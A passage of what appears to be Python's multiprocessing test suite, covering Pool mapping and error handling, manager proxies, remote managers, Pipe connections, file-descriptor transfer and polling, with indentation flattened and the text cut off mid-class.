self.assertEqual(d['supplies']['water'], 10)
d['supplies']['blankets'] = 5
self.assertEqual(supplies['blankets'], 5)
self.assertEqual(d['supplies']['blankets'], 5)
d['supplies']['water'] = 7
self.assertEqual(supplies['water'], 7)
self.assertEqual(d['supplies']['water'], 7)
del pets
del supplies
self.assertEqual(d['pets']['ferrets'], 2)
d['supplies']['blankets'] = 11
self.assertEqual(d['supplies']['blankets'], 11)
pets = d['pets']
supplies = d['supplies']
supplies['water'] = 7
self.assertEqual(supplies['water'], 7)
self.assertEqual(d['supplies']['water'], 7)
d.clear()
self.assertEqual(len(d), 0)
self.assertEqual(supplies['water'], 7)
self.assertEqual(pets['hamsters'], 4)
l = self.list([pets, supplies])
l[0]['marmots'] = 1
self.assertEqual(pets['marmots'], 1)
self.assertEqual(l[0]['marmots'], 1)
del pets
del supplies
self.assertEqual(l[0]['marmots'], 1)
outer = self.list([[88, 99], l])
self.assertIsInstance(outer[0], list) # Not a ListProxy
self.assertEqual(outer[-1][-1]['feed'], 3)
def test_namespace(self):
n = self.Namespace()
n.name = 'Bob'
n.job = 'Builder'
n._hidden = 'hidden'
self.assertEqual((n.name, n.job), ('Bob', 'Builder'))
del n.job
self.assertEqual(str(n), "Namespace(name='Bob')")
self.assertTrue(hasattr(n, 'name'))
self.assertTrue(not hasattr(n, 'job'))
#
#
#
def sqr(x, wait=0.0):
time.sleep(wait)
return x*x
def mul(x, y):
return x*y
def raise_large_valuerror(wait):
time.sleep(wait)
raise ValueError("x" * 1024**2)
def identity(x):
return x
class CountedObject(object):
n_instances = 0
def __new__(cls):
cls.n_instances += 1
return object.__new__(cls)
def __del__(self):
type(self).n_instances -= 1
class SayWhenError(ValueError): pass
def exception_throwing_generator(total, when):
if when == -1:
raise SayWhenError("Somebody said when")
for i in range(total):
if i == when:
raise SayWhenError("Somebody said when")
yield i
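# Hedged illustration (not part of the original test module): sqr(), mul() and
# exception_throwing_generator() above are the workloads driven by the Pool
# tests below. A minimal standalone sketch of the pattern they exercise:
def _demo_pool_usage():
    with multiprocessing.Pool(2) as pool:
        squares = pool.map(sqr, range(5))               # [0, 1, 4, 9, 16]
        products = pool.starmap(mul, [(2, 3), (4, 5)])  # [6, 20]
    return squares, products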
class _TestPool(BaseTestCase):
@classmethod
def setUpClass(cls):
super().setUpClass()
cls.pool = cls.Pool(4)
@classmethod
def tearDownClass(cls):
cls.pool.terminate()
cls.pool.join()
cls.pool = None
super().tearDownClass()
def test_apply(self):
papply = self.pool.apply
self.assertEqual(papply(sqr, (5,)), sqr(5))
self.assertEqual(papply(sqr, (), {'x':3}), sqr(x=3))
def test_map(self):
pmap = self.pool.map
self.assertEqual(pmap(sqr, list(range(10))), list(map(sqr, list(range(10)))))
self.assertEqual(pmap(sqr, list(range(100)), chunksize=20),
list(map(sqr, list(range(100)))))
def test_starmap(self):
psmap = self.pool.starmap
tuples = list(zip(range(10), range(9,-1, -1)))
self.assertEqual(psmap(mul, tuples),
list(itertools.starmap(mul, tuples)))
tuples = list(zip(range(100), range(99,-1, -1)))
self.assertEqual(psmap(mul, tuples, chunksize=20),
list(itertools.starmap(mul, tuples)))
def test_starmap_async(self):
tuples = list(zip(range(100), range(99,-1, -1)))
self.assertEqual(self.pool.starmap_async(mul, tuples).get(),
list(itertools.starmap(mul, tuples)))
def test_map_async(self):
self.assertEqual(self.pool.map_async(sqr, list(range(10))).get(),
list(map(sqr, list(range(10)))))
def test_map_async_callbacks(self):
call_args = self.manager.list() if self.TYPE == 'manager' else []
self.pool.map_async(int, ['1'],
callback=call_args.append,
error_callback=call_args.append).wait()
self.assertEqual(1, len(call_args))
self.assertEqual([1], call_args[0])
self.pool.map_async(int, ['a'],
callback=call_args.append,
error_callback=call_args.append).wait()
self.assertEqual(2, len(call_args))
self.assertIsInstance(call_args[1], ValueError)
def test_map_unpicklable(self):
# Issue #19425 -- failure to pickle should not cause a hang
if self.TYPE == 'threads':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
class A(object):
def __reduce__(self):
raise RuntimeError('cannot pickle')
with self.assertRaises(RuntimeError):
self.pool.map(sqr, [A()]*10)
def test_map_chunksize(self):
try:
self.pool.map_async(sqr, [], chunksize=1).get(timeout=TIMEOUT1)
except multiprocessing.TimeoutError:
self.fail("pool.map_async with chunksize stalled on null list")
def test_map_handle_iterable_exception(self):
if self.TYPE == 'manager':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
# SayWhenError seen at the very start of the iterable
with self.assertRaises(SayWhenError):
self.pool.map(sqr, exception_throwing_generator(1, -1), 1)
# again, make sure it's reentrant
with self.assertRaises(SayWhenError):
self.pool.map(sqr, exception_throwing_generator(1, -1), 1)
with self.assertRaises(SayWhenError):
self.pool.map(sqr, exception_throwing_generator(10, 3), 1)
class SpecialIterable:
def __iter__(self):
return self
def __next__(self):
raise SayWhenError
def __len__(self):
return 1
with self.assertRaises(SayWhenError):
self.pool.map(sqr, SpecialIterable(), 1)
with self.assertRaises(SayWhenError):
self.pool.map(sqr, SpecialIterable(), 1)
def test_async(self):
res = self.pool.apply_async(sqr, (7, TIMEOUT1,))
get = TimingWrapper(res.get)
self.assertEqual(get(), 49)
self.assertTimingAlmostEqual(get.elapsed, TIMEOUT1)
def test_async_timeout(self):
res = self.pool.apply_async(sqr, (6, TIMEOUT2 + 1.0))
get = TimingWrapper(res.get)
self.assertRaises(multiprocessing.TimeoutError, get, timeout=TIMEOUT2)
self.assertTimingAlmostEqual(get.elapsed, TIMEOUT2)
def test_imap(self):
it = self.pool.imap(sqr, list(range(10)))
self.assertEqual(list(it), list(map(sqr, list(range(10)))))
it = self.pool.imap(sqr, list(range(10)))
for i in range(10):
self.assertEqual(next(it), i*i)
self.assertRaises(StopIteration, it.__next__)
it = self.pool.imap(sqr, list(range(1000)), chunksize=100)
for i in range(1000):
self.assertEqual(next(it), i*i)
self.assertRaises(StopIteration, it.__next__)
def test_imap_handle_iterable_exception(self):
if self.TYPE == 'manager':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
# SayWhenError seen at the very start of the iterable
it = self.pool.imap(sqr, exception_throwing_generator(1, -1), 1)
self.assertRaises(SayWhenError, it.__next__)
# again, make sure it's reentrant
it = self.pool.imap(sqr, exception_throwing_generator(1, -1), 1)
self.assertRaises(SayWhenError, it.__next__)
it = self.pool.imap(sqr, exception_throwing_generator(10, 3), 1)
for i in range(3):
self.assertEqual(next(it), i*i)
self.assertRaises(SayWhenError, it.__next__)
# SayWhenError seen at start of problematic chunk's results
it = self.pool.imap(sqr, exception_throwing_generator(20, 7), 2)
for i in range(6):
self.assertEqual(next(it), i*i)
self.assertRaises(SayWhenError, it.__next__)
it = self.pool.imap(sqr, exception_throwing_generator(20, 7), 4)
for i in range(4):
self.assertEqual(next(it), i*i)
self.assertRaises(SayWhenError, it.__next__)
def test_imap_unordered(self):
it = self.pool.imap_unordered(sqr, list(range(10)))
self.assertEqual(sorted(it), list(map(sqr, list(range(10)))))
it = self.pool.imap_unordered(sqr, list(range(1000)), chunksize=100)
self.assertEqual(sorted(it), list(map(sqr, list(range(1000)))))
def test_imap_unordered_handle_iterable_exception(self):
if self.TYPE == 'manager':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
# SayWhenError seen at the very start of the iterable
it = self.pool.imap_unordered(sqr,
exception_throwing_generator(1, -1),
1)
self.assertRaises(SayWhenError, it.__next__)
# again, make sure it's reentrant
it = self.pool.imap_unordered(sqr,
exception_throwing_generator(1, -1),
1)
self.assertRaises(SayWhenError, it.__next__)
it = self.pool.imap_unordered(sqr,
exception_throwing_generator(10, 3),
1)
expected_values = list(map(sqr, list(range(10))))
with self.assertRaises(SayWhenError):
# imap_unordered makes it difficult to anticipate the SayWhenError
for i in range(10):
value = next(it)
self.assertIn(value, expected_values)
expected_values.remove(value)
it = self.pool.imap_unordered(sqr,
exception_throwing_generator(20, 7),
2)
expected_values = list(map(sqr, list(range(20))))
with self.assertRaises(SayWhenError):
for i in range(20):
value = next(it)
self.assertIn(value, expected_values)
expected_values.remove(value)
def test_make_pool(self):
expected_error = (RemoteError if self.TYPE == 'manager'
else ValueError)
self.assertRaises(expected_error, self.Pool, -1)
self.assertRaises(expected_error, self.Pool, 0)
if self.TYPE != 'manager':
p = self.Pool(3)
try:
self.assertEqual(3, len(p._pool))
finally:
p.close()
p.join()
def test_terminate(self):
result = self.pool.map_async(
time.sleep, [0.1 for i in range(10000)], chunksize=1
)
self.pool.terminate()
join = TimingWrapper(self.pool.join)
join()
# Sanity check the pool didn't wait for all tasks to finish
self.assertLess(join.elapsed, 2.0)
def test_empty_iterable(self):
# See Issue 12157
p = self.Pool(1)
self.assertEqual(p.map(sqr, []), [])
self.assertEqual(list(p.imap(sqr, [])), [])
self.assertEqual(list(p.imap_unordered(sqr, [])), [])
self.assertEqual(p.map_async(sqr, []).get(), [])
p.close()
p.join()
def test_context(self):
if self.TYPE == 'processes':
L = list(range(10))
expected = [sqr(i) for i in L]
with self.Pool(2) as p:
r = p.map_async(sqr, L)
self.assertEqual(r.get(), expected)
p.join()
self.assertRaises(ValueError, p.map_async, sqr, L)
@classmethod
def _test_traceback(cls):
raise RuntimeError(123) # some comment
def test_traceback(self):
# We want to ensure that the traceback from the child process is
# contained in the traceback raised in the main process.
if self.TYPE == 'processes':
with self.Pool(1) as p:
try:
p.apply(self._test_traceback)
except Exception as e:
exc = e
else:
self.fail('expected RuntimeError')
p.join()
self.assertIs(type(exc), RuntimeError)
self.assertEqual(exc.args, (123,))
cause = exc.__cause__
self.assertIs(type(cause), multiprocessing.pool.RemoteTraceback)
self.assertIn('raise RuntimeError(123) # some comment', cause.tb)
with test.support.captured_stderr() as f1:
try:
raise exc
except RuntimeError:
sys.excepthook(*sys.exc_info())
self.assertIn('raise RuntimeError(123) # some comment',
f1.getvalue())
# _helper_reraises_exception should not make the error
# a remote exception
with self.Pool(1) as p:
try:
p.map(sqr, exception_throwing_generator(1, -1), 1)
except Exception as e:
exc = e
else:
self.fail('expected SayWhenError')
self.assertIs(type(exc), SayWhenError)
self.assertIs(exc.__cause__, None)
p.join()
@classmethod
def _test_wrapped_exception(cls):
raise RuntimeError('foo')
def test_wrapped_exception(self):
# Issue #20980: Should not wrap exception when using thread pool
with self.Pool(1) as p:
with self.assertRaises(RuntimeError):
p.apply(self._test_wrapped_exception)
p.join()
def test_map_no_failfast(self):
# Issue #23992: the fail-fast behaviour when an exception is raised
# during map() would make Pool.join() deadlock, because a worker
# process would fill the result queue (after the result handler thread
# terminated, hence not draining it anymore).
t_start = time.monotonic()
with self.assertRaises(ValueError):
with self.Pool(2) as p:
try:
p.map(raise_large_valuerror, [0, 1])
finally:
time.sleep(0.5)
p.close()
p.join()
# check that we indeed waited for all jobs
self.assertGreater(time.monotonic() - t_start, 0.9)
def test_release_task_refs(self):
# Issue #29861: task arguments and results should not be kept
# alive after we are done with them.
objs = [CountedObject() for i in range(10)]
refs = [weakref.ref(o) for o in objs]
self.pool.map(identity, objs)
del objs
time.sleep(DELTA) # let threaded cleanup code run
self.assertEqual(set(wr() for wr in refs), {None})
# With a process pool, copies of the objects are returned, check
# they were released too.
self.assertEqual(CountedObject.n_instances, 0)
def test_enter(self):
if self.TYPE == 'manager':
self.skipTest("test not applicable to manager")
pool = self.Pool(1)
with pool:
pass
# the with-block calls pool.terminate() on exit,
# so the pool is no longer running
with self.assertRaises(ValueError):
# bpo-35477: pool.__enter__() fails if the pool is not running
with pool:
pass
pool.join()
def test_resource_warning(self):
if self.TYPE == 'manager':
self.skipTest("test not applicable to manager")
pool = self.Pool(1)
pool.terminate()
pool.join()
# force state to RUN to emit ResourceWarning in __del__()
pool._state = multiprocessing.pool.RUN
with support.check_warnings(('unclosed running multiprocessing pool',
ResourceWarning)):
pool = None
support.gc_collect()
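# Helpers for the worker-error tests below: raising() triggers the
# error_callback path, while unpickleable_result() returns a lambda that
# cannot be pickled back to the parent.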
def raising():
raise KeyError("key")
def unpickleable_result():
return lambda: 42
class _TestPoolWorkerErrors(BaseTestCase):
ALLOWED_TYPES = ('processes', )
def test_async_error_callback(self):
p = multiprocessing.Pool(2)
scratchpad = [None]
def errback(exc):
scratchpad[0] = exc
res = p.apply_async(raising, error_callback=errback)
self.assertRaises(KeyError, res.get)
self.assertTrue(scratchpad[0])
self.assertIsInstance(scratchpad[0], KeyError)
p.close()
p.join()
def test_unpickleable_result(self):
from multiprocessing.pool import MaybeEncodingError
p = multiprocessing.Pool(2)
# Make sure we don't lose pool processes because of encoding errors.
for iteration in range(20):
scratchpad = [None]
def errback(exc):
scratchpad[0] = exc
res = p.apply_async(unpickleable_result, error_callback=errback)
self.assertRaises(MaybeEncodingError, res.get)
wrapped = scratchpad[0]
self.assertTrue(wrapped)
self.assertIsInstance(scratchpad[0], MaybeEncodingError)
self.assertIsNotNone(wrapped.exc)
self.assertIsNotNone(wrapped.value)
p.close()
p.join()
class _TestPoolWorkerLifetime(BaseTestCase):
ALLOWED_TYPES = ('processes', )
def test_pool_worker_lifetime(self):
p = multiprocessing.Pool(3, maxtasksperchild=10)
self.assertEqual(3, len(p._pool))
origworkerpids = [w.pid for w in p._pool]
# Run many tasks so each worker gets replaced (hopefully)
results = []
for i in range(100):
results.append(p.apply_async(sqr, (i, )))
# Fetch the results and verify we got the right answers,
# also ensuring all the tasks have completed.
for (j, res) in enumerate(results):
self.assertEqual(res.get(), sqr(j))
# Refill the pool
p._repopulate_pool()
# Wait until all workers are alive
# (countdown * DELTA = 5 seconds max startup process time)
countdown = 50
while countdown and not all(w.is_alive() for w in p._pool):
countdown -= 1
time.sleep(DELTA)
finalworkerpids = [w.pid for w in p._pool]
# All pids should be assigned. See issue #7805.
self.assertNotIn(None, origworkerpids)
self.assertNotIn(None, finalworkerpids)
# Finally, check that the worker pids have changed
self.assertNotEqual(sorted(origworkerpids), sorted(finalworkerpids))
p.close()
p.join()
def test_pool_worker_lifetime_early_close(self):
# Issue #10332: closing a pool whose workers have limited lifetimes
# before all the tasks completed would make join() hang.
p = multiprocessing.Pool(3, maxtasksperchild=1)
results = []
for i in range(6):
results.append(p.apply_async(sqr, (i, 0.3)))
p.close()
p.join()
# check the results
for (j, res) in enumerate(results):
self.assertEqual(res.get(), sqr(j))
#
# Test of creating a customized manager class
#
from multiprocessing.managers import BaseManager, BaseProxy, RemoteError
class FooBar(object):
def f(self):
return 'f()'
def g(self):
raise ValueError
def _h(self):
return '_h()'
def baz():
for i in range(10):
yield i*i
class IteratorProxy(BaseProxy):
_exposed_ = ('__next__',)
def __iter__(self):
return self
def __next__(self):
return self._callmethod('__next__')
class MyManager(BaseManager):
pass
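# Register three proxy types on MyManager: 'Foo' exposes FooBar's public
# methods, 'Bar' uses 'exposed' to publish only f() and _h(), and 'baz'
# wraps the generator in IteratorProxy so it can be iterated remotely.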
MyManager.register('Foo', callable=FooBar)
MyManager.register('Bar', callable=FooBar, exposed=('f', '_h'))
MyManager.register('baz', callable=baz, proxytype=IteratorProxy)
class _TestMyManager(BaseTestCase):
ALLOWED_TYPES = ('manager',)
def test_mymanager(self):
manager = MyManager()
manager.start()
self.common(manager)
manager.shutdown()
# If the manager process exited cleanly then the exitcode
# will be zero. Otherwise (after a short timeout)
# terminate() is used, resulting in an exitcode of -SIGTERM.
self.assertEqual(manager._process.exitcode, 0)
def test_mymanager_context(self):
with MyManager() as manager:
self.common(manager)
# bpo-30356: BaseManager._finalize_manager() sends SIGTERM
# to the manager process if it takes longer than 1 second to stop.
self.assertIn(manager._process.exitcode, (0, -signal.SIGTERM))
def test_mymanager_context_prestarted(self):
manager = MyManager()
manager.start()
with manager:
self.common(manager)
self.assertEqual(manager._process.exitcode, 0)
def common(self, manager):
foo = manager.Foo()
bar = manager.Bar()
baz = manager.baz()
foo_methods = [name for name in ('f', 'g', '_h') if hasattr(foo, name)]
bar_methods = [name for name in ('f', 'g', '_h') if hasattr(bar, name)]
self.assertEqual(foo_methods, ['f', 'g'])
self.assertEqual(bar_methods, ['f', '_h'])
self.assertEqual(foo.f(), 'f()')
self.assertRaises(ValueError, foo.g)
self.assertEqual(foo._callmethod('f'), 'f()')
self.assertRaises(RemoteError, foo._callmethod, '_h')
self.assertEqual(bar.f(), 'f()')
self.assertEqual(bar._h(), '_h()')
self.assertEqual(bar._callmethod('f'), 'f()')
self.assertEqual(bar._callmethod('_h'), '_h()')
self.assertEqual(list(baz), [i*i for i in range(10)])
#
# Test of connecting to a remote server and using xmlrpclib for serialization
#
_queue = pyqueue.Queue()
def get_queue():
return _queue
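# QueueManager serves this queue via the registered get_queue() callable;
# QueueManager2 registers the same name without a callable, so it can only
# connect to an existing server.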
class QueueManager(BaseManager):
'''manager class used by server process'''
QueueManager.register('get_queue', callable=get_queue)
class QueueManager2(BaseManager):
'''manager class which specifies the same interface as QueueManager'''
QueueManager2.register('get_queue')
SERIALIZER = 'xmlrpclib'
class _TestRemoteManager(BaseTestCase):
ALLOWED_TYPES = ('manager',)
values = ['hello world', None, True, 2.25,
'hall\xe5 v\xe4rlden',
'\u043f\u0440\u0438\u0432\u0456\u0442 \u0441\u0432\u0456\u0442',
b'hall\xe5 v\xe4rlden',
]
result = values[:]
@classmethod
def _putter(cls, address, authkey):
manager = QueueManager2(
address=address, authkey=authkey, serializer=SERIALIZER
)
manager.connect()
queue = manager.get_queue()
# Note that xmlrpclib will deserialize the object as a list, not a tuple
queue.put(tuple(cls.values))
def test_remote(self):
authkey = os.urandom(32)
manager = QueueManager(
address=(test.support.HOST, 0), authkey=authkey, serializer=SERIALIZER
)
manager.start()
self.addCleanup(manager.shutdown)
p = self.Process(target=self._putter, args=(manager.address, authkey))
p.daemon = True
p.start()
manager2 = QueueManager2(
address=manager.address, authkey=authkey, serializer=SERIALIZER
)
manager2.connect()
queue = manager2.get_queue()
self.assertEqual(queue.get(), self.result)
# Because we are using xmlrpclib for serialization instead of
# pickle this will cause a serialization error.
self.assertRaises(Exception, queue.put, time.sleep)
# Make queue finalizer run before the server is stopped
del queue
class _TestManagerRestart(BaseTestCase):
@classmethod
def _putter(cls, address, authkey):
manager = QueueManager(
address=address, authkey=authkey, serializer=SERIALIZER)
manager.connect()
queue = manager.get_queue()
queue.put('hello world')
def test_rapid_restart(self):
authkey = os.urandom(32)
manager = QueueManager(
address=(test.support.HOST, 0), authkey=authkey, serializer=SERIALIZER)
try:
srvr = manager.get_server()
addr = srvr.address
# Close the connection.Listener socket which gets opened as a part
# of manager.get_server(). It's not needed for the test.
srvr.listener.close()
manager.start()
p = self.Process(target=self._putter, args=(manager.address, authkey))
p.start()
p.join()
queue = manager.get_queue()
self.assertEqual(queue.get(), 'hello world')
del queue
finally:
if hasattr(manager, "shutdown"):
manager.shutdown()
manager = QueueManager(
address=addr, authkey=authkey, serializer=SERIALIZER)
try:
manager.start()
self.addCleanup(manager.shutdown)
except OSError as e:
if e.errno != errno.EADDRINUSE:
raise
# Retry after some time, in case the old socket was lingering
# (sporadic failure on buildbots)
time.sleep(1.0)
manager = QueueManager(
address=addr, authkey=authkey, serializer=SERIALIZER)
if hasattr(manager, "shutdown"):
self.addCleanup(manager.shutdown)
#
#
#
SENTINEL = latin('')
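# Empty-bytes sentinel: the _echo() child in _TestConnection stops echoing
# once it receives it.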
class _TestConnection(BaseTestCase):
ALLOWED_TYPES = ('processes', 'threads')
@classmethod
def _echo(cls, conn):
for msg in iter(conn.recv_bytes, SENTINEL):
conn.send_bytes(msg)
conn.close()
def test_connection(self):
conn, child_conn = self.Pipe()
p = self.Process(target=self._echo, args=(child_conn,))
p.daemon = True
p.start()
seq = [1, 2.25, None]
msg = latin('hello world')
longmsg = msg * 10
arr = array.array('i', list(range(4)))
if self.TYPE == 'processes':
self.assertEqual(type(conn.fileno()), int)
self.assertEqual(conn.send(seq), None)
self.assertEqual(conn.recv(), seq)
self.assertEqual(conn.send_bytes(msg), None)
self.assertEqual(conn.recv_bytes(), msg)
if self.TYPE == 'processes':
buffer = array.array('i', [0]*10)
expected = list(arr) + [0] * (10 - len(arr))
self.assertEqual(conn.send_bytes(arr), None)
self.assertEqual(conn.recv_bytes_into(buffer),
len(arr) * buffer.itemsize)
self.assertEqual(list(buffer), expected)
buffer = array.array('i', [0]*10)
expected = [0] * 3 + list(arr) + [0] * (10 - 3 - len(arr))
self.assertEqual(conn.send_bytes(arr), None)
self.assertEqual(conn.recv_bytes_into(buffer, 3 * buffer.itemsize),
len(arr) * buffer.itemsize)
self.assertEqual(list(buffer), expected)
buffer = bytearray(latin(' ' * 40))
self.assertEqual(conn.send_bytes(longmsg), None)
try:
res = conn.recv_bytes_into(buffer)
except multiprocessing.BufferTooShort as e:
self.assertEqual(e.args, (longmsg,))
else:
self.fail('expected BufferTooShort, got %s' % res)
poll = TimingWrapper(conn.poll)
self.assertEqual(poll(), False)
self.assertTimingAlmostEqual(poll.elapsed, 0)
self.assertEqual(poll(-1), False)
self.assertTimingAlmostEqual(poll.elapsed, 0)
self.assertEqual(poll(TIMEOUT1), False)
self.assertTimingAlmostEqual(poll.elapsed, TIMEOUT1)
conn.send(None)
time.sleep(.1)
self.assertEqual(poll(TIMEOUT1), True)
self.assertTimingAlmostEqual(poll.elapsed, 0)
self.assertEqual(conn.recv(), None)
really_big_msg = latin('X') * (1024 * 1024 * 16)  # 16 MiB
conn.send_bytes(really_big_msg)
self.assertEqual(conn.recv_bytes(), really_big_msg)
conn.send_bytes(SENTINEL) # tell child to quit
child_conn.close()
if self.TYPE == 'processes':
self.assertEqual(conn.readable, True)
self.assertEqual(conn.writable, True)
self.assertRaises(EOFError, conn.recv)
self.assertRaises(EOFError, conn.recv_bytes)
p.join()
def test_duplex_false(self):
reader, writer = self.Pipe(duplex=False)
self.assertEqual(writer.send(1), None)
self.assertEqual(reader.recv(), 1)
if self.TYPE == 'processes':
self.assertEqual(reader.readable, True)
self.assertEqual(reader.writable, False)
self.assertEqual(writer.readable, False)
self.assertEqual(writer.writable, True)
self.assertRaises(OSError, reader.send, 2)
self.assertRaises(OSError, writer.recv)
self.assertRaises(OSError, writer.poll)
def test_spawn_close(self):
# We test that a pipe connection can be closed by the parent
# process immediately after the child is spawned. On Windows this
# would have sometimes failed on old versions because
# child_conn would be closed before the child got a chance to
# duplicate it.
conn, child_conn = self.Pipe()
p = self.Process(target=self._echo, args=(child_conn,))
p.daemon = True
p.start()
child_conn.close() # this might complete before child initializes
msg = latin('hello')
conn.send_bytes(msg)
self.assertEqual(conn.recv_bytes(), msg)
conn.send_bytes(SENTINEL)
conn.close()
p.join()
def test_sendbytes(self):
if self.TYPE != 'processes':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
msg = latin('abcdefghijklmnopqrstuvwxyz')
a, b = self.Pipe()
a.send_bytes(msg)
self.assertEqual(b.recv_bytes(), msg)
a.send_bytes(msg, 5)
self.assertEqual(b.recv_bytes(), msg[5:])
a.send_bytes(msg, 7, 8)
self.assertEqual(b.recv_bytes(), msg[7:7+8])
a.send_bytes(msg, 26)
self.assertEqual(b.recv_bytes(), latin(''))
a.send_bytes(msg, 26, 0)
self.assertEqual(b.recv_bytes(), latin(''))
self.assertRaises(ValueError, a.send_bytes, msg, 27)
self.assertRaises(ValueError, a.send_bytes, msg, 22, 5)
self.assertRaises(ValueError, a.send_bytes, msg, 26, 1)
self.assertRaises(ValueError, a.send_bytes, msg, -1)
self.assertRaises(ValueError, a.send_bytes, msg, 4, -1)
@classmethod
def _is_fd_assigned(cls, fd):
try:
os.fstat(fd)
except OSError as e:
if e.errno == errno.EBADF:
return False
raise
else:
return True
@classmethod
def _writefd(cls, conn, data, create_dummy_fds=False):
if create_dummy_fds:
for i in range(0, 256):
if not cls._is_fd_assigned(i):
os.dup2(conn.fileno(), i)
fd = reduction.recv_handle(conn)
if msvcrt:
fd = msvcrt.open_osfhandle(fd, os.O_WRONLY)
os.write(fd, data)
os.close(fd)
@unittest.skipUnless(HAS_REDUCTION, "test needs multiprocessing.reduction")
def test_fd_transfer(self):
if self.TYPE != 'processes':
self.skipTest("only makes sense with processes")
conn, child_conn = self.Pipe(duplex=True)
p = self.Process(target=self._writefd, args=(child_conn, b"foo"))
p.daemon = True
p.start()
self.addCleanup(test.support.unlink, test.support.TESTFN)
with open(test.support.TESTFN, "wb") as f:
fd = f.fileno()
if msvcrt:
fd = msvcrt.get_osfhandle(fd)
reduction.send_handle(conn, fd, p.pid)
p.join()
with open(test.support.TESTFN, "rb") as f:
self.assertEqual(f.read(), b"foo")
@unittest.skipUnless(HAS_REDUCTION, "test needs multiprocessing.reduction")
@unittest.skipIf(sys.platform == "win32",
"test semantics don't make sense on Windows")
@unittest.skipIf(MAXFD <= 256,
"largest assignable fd number is too small")
@unittest.skipUnless(hasattr(os, "dup2"),
"test needs os.dup2()")
def test_large_fd_transfer(self):
# With fd > 256 (issue #11657)
if self.TYPE != 'processes':
self.skipTest("only makes sense with processes")
conn, child_conn = self.Pipe(duplex=True)
p = self.Process(target=self._writefd, args=(child_conn, b"bar", True))
p.daemon = True
p.start()
self.addCleanup(test.support.unlink, test.support.TESTFN)
with open(test.support.TESTFN, "wb") as f:
fd = f.fileno()
for newfd in range(256, MAXFD):
if not self._is_fd_assigned(newfd):
break
else:
self.fail("could not find an unassigned large file descriptor")
os.dup2(fd, newfd)
try:
reduction.send_handle(conn, newfd, p.pid)
finally:
os.close(newfd)
p.join()
with open(test.support.TESTFN, "rb") as f:
self.assertEqual(f.read(), b"bar")
@classmethod
def _send_data_without_fd(cls, conn):
os.write(conn.fileno(), b"\0")
@unittest.skipUnless(HAS_REDUCTION, "test needs multiprocessing.reduction")
@unittest.skipIf(sys.platform == "win32", "doesn't make sense on Windows")
def test_missing_fd_transfer(self):
# Check that exception is raised when received data is not
# accompanied by a file descriptor in ancillary data.
if self.TYPE != 'processes':
self.skipTest("only makes sense with processes")
conn, child_conn = self.Pipe(duplex=True)
p = self.Process(target=self._send_data_without_fd, args=(child_conn,))
p.daemon = True
p.start()
self.assertRaises(RuntimeError, reduction.recv_handle, conn)
p.join()
def test_context(self):
a, b = self.Pipe()
with a, b:
a.send(1729)
self.assertEqual(b.recv(), 1729)
if self.TYPE == 'processes':
self.assertFalse(a.closed)
self.assertFalse(b.closed)
if self.TYPE == 'processes':
self.assertTrue(a.closed)
self.assertTrue(b.closed)
self.assertRaises(OSError, a.recv)
self.assertRaises(OSError, b.recv)
class _TestListener(BaseTestCase):
ALLOWED_TYPES = ('processes',)
def test_multiple_bind(self):
for family in self.connection.families:
l = self.connection.Listener(family=family)
self.addCleanup(l.close)
self.assertRaises(OSError, self.connection.Listener,
l.address, family)
def test_context(self):
with self.connection.Listener() as l:
with self.connection.Client(l.address) as c:
with l.accept() as d:
c.send(1729)
self.assertEqual(d.recv(), 1729)
if self.TYPE == 'processes':
self.assertRaises(OSError, l.accept)
class _TestListenerClient(BaseTestCase):
ALLOWED_TYPES = ('processes', 'threads')
@classmethod
def _test(cls, address):
conn = cls.connection.Client(address)
conn.send('hello')
conn.close()
def test_listener_client(self):
for family in self.connection.families:
l = self.connection.Listener(family=family)
p = self.Process(target=self._test, args=(l.address,))
p.daemon = True
p.start()
conn = l.accept()
self.assertEqual(conn.recv(), 'hello')
p.join()
l.close()
def test_issue14725(self):
l = self.connection.Listener()
p = self.Process(target=self._test, args=(l.address,))
p.daemon = True
p.start()
time.sleep(1)
# On Windows the client process should by now have connected,
# written data and closed the pipe handle. This causes
# ConnectNamedPipe() to fail with ERROR_NO_DATA. See Issue
# 14725.
conn = l.accept()
self.assertEqual(conn.recv(), 'hello')
conn.close()
p.join()
l.close()
def test_issue16955(self):
for fam in self.connection.families:
l = self.connection.Listener(family=fam)
c = self.connection.Client(l.address)
a = l.accept()
a.send_bytes(b"hello")
self.assertTrue(c.poll(1))
a.close()
c.close()
l.close()
class _TestPoll(BaseTestCase):
ALLOWED_TYPES = ('processes', 'threads')
def test_empty_string(self):
a, b = self.Pipe()
self.assertEqual(a.poll(), False)
b.send_bytes(b'')
self.assertEqual(a.poll(), True)
self.assertEqual(a.poll(), True)
@classmethod
def _child_strings(cls, conn, strings):
for s in strings:
time.sleep(0.1)
conn.send_bytes(s)
conn.close()
def test_strings(self):
strings = (b'hello', b'', b'a', b'b', b'', b'bye', b'', b'lop')
a, b = self.Pipe()
p = self.Process(target=self._child_strings, args=(b, strings))
p.start()
for s in strings:
for i in range(200):
if a.poll(0.01):
break
x = a.recv_bytes()
self.assertEqual(s, x)
p.join()
@classmethod
def _child_boundaries(cls, r):
# Polling may "pull" a message in to the child process, but we
# don't want it to pull only part of a message, as that would
# corrupt the pipe for any other processes which might later
# read from it.
r.poll(5)
def test_boundaries(self):
r, w = self.Pipe(False)
p = self.Process(target=self._child_boundaries, args=(r,))
p.start()
time.sleep(2)
L = [b"first", b"second"]
for obj in L:
w.send_bytes(obj)
w.close()
p.join()
self.assertIn(r.recv_bytes(), L)
@classmethod
def _child_dont_merge(cls, b):
b.send_bytes(b'a')
b.send_bytes(b'b')
b.send_bytes(b'cd')
def test_dont_merge(self):
a, b = self.Pipe()
self.assertEqual(a.poll(0.0), False)
self.assertEqual(a.poll(0.1), False)
p = self.Process(target=self._child_dont_merge, args=(b,))
p.start()
self.assertEqual(a.recv_bytes(), b'a')
self.assertEqual(a.poll(1.0), True)
self.assertEqual(a.poll(1.0), True)
self.assertEqual(a.recv_bytes(), b'b')
self.assertEqual(a.poll(1.0), True)
self.assertEqual(a.poll(1.0), True)
self.assertEqual(a.poll(0.0), True)
self.assertEqual(a.recv_bytes(), b'cd')
p.join()
#
# Test of sending connection and socket objects between processes
#
@unittest.skipUnless(HAS_REDUCTION, "test needs multiprocessing.reduction")
class _TestPicklingConnections(BaseTestCase):
ALLOWED_TYPES = ('processes',)
@classmethod
def tearDownClass(cls):
